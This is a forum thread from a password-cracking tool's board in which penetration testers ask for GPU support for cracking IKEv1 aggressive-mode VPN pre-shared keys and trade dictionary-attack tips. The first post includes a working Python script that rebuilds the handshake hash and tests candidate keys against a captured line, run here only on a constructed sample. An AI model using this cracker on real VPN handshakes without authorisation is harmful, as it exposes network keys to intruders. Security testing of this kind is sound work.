IKE Preshared Key from Aggressive Mode VPNs
#1
1. Any thoughts on implementing "ikescan/psk-crack" functionality in hashcat?

2. Anyone know of a better solution to recovering PSKs than using psk-crack? I'm looking for a GPU or clustered solution.

Rainbow table use is not possible due to HMAC hashing of the SHA1/MD5 value, as I understand it....

As a professional pentester of 10 years, a GPU based cracking implementation for PSK aggressive mode seems like an obvious thing to do. I assume that I'm not aware of a GPU solution already implemented? Hope so anyway. We see over 90% of our clients allowing aggressive mode and I'm tired of saying it's 'possible' to break that key; I'd rather show them.

Thanks in advance.
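To show what psk-crack actually computes, and why the per-session nonces rule out precomputation, here is an added example in Python. It is not code from this thread, from hashcat or from ike-scan. The HASH_R formula is the one in RFC 2409 section 5.4; the colon-separated field order (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r) is my recollection of the psk-crack file layout and should be treated as an assumption, and every input byte in the sample line is constructed, not captured from a real VPN.

```python
"""Offline dictionary attack on an IKEv1 aggressive-mode PSK (RFC 2409 section 5.4).

Added example, not code from the thread or from hashcat/ike-scan. It recomputes
HASH_R the way psk-crack does and compares it with the captured value.
"""
import hashlib
import hmac

# Pseudo-random function negotiated in phase 1: HMAC keyed with the hash from the SA.
PRF = {"md5": hashlib.md5, "sha1": hashlib.sha1}


def ike_hash_r(psk, g_xr, g_xi, cky_r, cky_i, sai_b, idir_b, ni_b, nr_b, hash_name="sha1"):
    """HASH_R for pre-shared-key authentication (RFC 2409 s5.4).

    SKEYID = prf(pre-shared-key, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)

    The responder sends HASH_R unencrypted in the second aggressive-mode
    message, and every other input is also on the wire, so an attacker can
    evaluate this function offline for each candidate PSK.
    """
    digest = PRF[hash_name]
    skeyid = hmac.new(psk, ni_b + nr_b, digest).digest()
    return hmac.new(skeyid, g_xr + g_xi + cky_r + cky_i + sai_b + idir_b, digest).digest()


def parse_psk_crack_line(line):
    """Split a colon-separated hex line into 9 byte strings.

    Field order assumed here (the psk-crack/ike-scan layout as I recall it):
    g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r
    """
    fields = line.strip().split(":")
    if len(fields) != 9:
        raise ValueError(f"expected 9 fields, got {len(fields)}")
    return tuple(bytes.fromhex(f) for f in fields)


def crack(line, candidates, hash_name=None):
    """Return the first candidate whose HASH_R matches, or None.

    Each candidate costs two HMACs and nothing can be precomputed: SKEYID is
    keyed by the PSK over the per-session nonces, which act as a salt. That is
    why a rainbow table does not help here; only raw throughput does.
    """
    *public, hash_r = parse_psk_crack_line(line)
    if hash_name is None:
        # Infer the negotiated hash from the digest length: 16 = MD5, 20 = SHA1.
        hash_name = {16: "md5", 20: "sha1"}[len(hash_r)]
    for cand in candidates:
        if hmac.compare_digest(ike_hash_r(cand.encode(), *public, hash_name=hash_name), hash_r):
            return cand
    return None


def build_sample_line(psk, hash_name="sha1"):
    """Constructed test vector (not a real capture): fixed public values plus a
    HASH_R derived from the given PSK, so the attack can be exercised offline."""
    g_xr = bytes(range(1, 129))             # stand-in for the responder's DH public value
    g_xi = bytes(range(128, 0, -1))         # stand-in for the initiator's DH public value
    cky_r = bytes.fromhex("0123456789abcdef")
    cky_i = bytes.fromhex("fedcba9876543210")
    sai_b = bytes.fromhex("00000001000000010000002c01010001"
                          "0000002401010000800b0001800c0e10"
                          "80010005800300018002000280040002")  # placeholder SA body
    idir_b = bytes.fromhex("01000000c0a80001")  # ID_IPV4_ADDR, 192.168.0.1 (made up)
    ni_b = bytes.fromhex("11" * 20)
    nr_b = bytes.fromhex("22" * 20)
    hash_r = ike_hash_r(psk, g_xr, g_xi, cky_r, cky_i, sai_b, idir_b, ni_b, nr_b, hash_name)
    return ":".join(f.hex() for f in (g_xr, g_xi, cky_r, cky_i, sai_b, idir_b, ni_b, nr_b, hash_r))


if __name__ == "__main__":
    sample = build_sample_line(b"Summer2012")
    print("recovered PSK:", crack(sample, ["password", "cisco", "Summer2012"]))
```

Because SKEYID is rekeyed per candidate and per session, the whole cost of the attack is HMAC throughput, which is exactly the part a GPU implementation would speed up; the wordlist and rule quality decide whether the key is in the candidate set at all.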
#2
1. I have no plans for implementing PSK auth cracking
2. No
#3
Well, that's too bad. It just seems odd that PSK cracking advancements just stopped around 07/08. I guess maybe I should ask what the mission statement or goal of the hashcat project is? The calculation numbers are pretty amazing, and given the frequency with which we find aggressive mode key exchange used in the field, I think there is a real opportunity to make some headlines with hashcat. Not to mention that the PSKs are usually only alpha/num.
#4
It just started as practice for my coding skills and a lot of fun when participating in the opencrack competition. The competition motivated me to find more efficient (new) cracking techniques such as the fingerprint attack, the permutation attack, new rules in the rule engine, etc., and then to find a good mixture of these new cracking techniques and performance. BTW, that's why the hashcat tools do not focus on brute-force cracking. So it's all about fun and competition.
#5
I see, that makes sense. And I didn't really notice the dictionary focus.

What are people using for dictionaries?

I've compiled a 6 gig one, all sorted and uniq'd, based on what torrents I've found. But even 6 gigs is completed in under 30 mins with psk-crack.
#6
Check out the oclhashcat fingerprint attack and see how it modifies dictionaries using the expander from hashcat-utils, then use the result with itself or with any other dictionary.
#7

> As a professional pentester of 10 years a GPU based cracking implementation for PSK aggressive mode seems like an obvious thing to do

+1
Where do I have to sign? :)
#8
(03-19-2012, 05:06 PM) hermix Wrote:
> > As a professional pentester of 10 years a GPU based cracking implementation for PSK aggressive mode seems like an obvious thing to do
>
> +1
> Where do I have to sign? :)

+2!

This is a great thread that both gives insight into the drivers of Hashcat (which I totally understand and agree with by the way) and also points out an important aspect of the professional security testing industry - the possibility to give practical proof of "theoretical" weaknesses.

As Hashcat is now becoming a _fantastic_ bruteforce tool, even though that might not be the primary focus, I would really love to see some work being done to provide support for IKE PSK cracking. Well, actually, this has nothing to do with bruteforce vs. more intelligent types of cracking; I would just love to see support for IKE PSK cracking (no matter if it's with standard Hashcat or through ocl)!
#9
A dictionary attack is good for systems without password rules. It finds only 20-30% of passwords (with rules). A well-configured system accepts only complex passwords of more than 12 characters. How many words have more than 12 characters?
Passwords are language dependent; other languages use other character sets.
oclhashcat is good for very fast brute-force ...
A good idea would be to implement a Markov model of natural language for the password generator.

SHA1-HMAC and MD5-HMAC are very good for pen-testing. All corporations use VPNs, and without testing the group key you have not tested WAN security.

D.
#10
+1 from me :)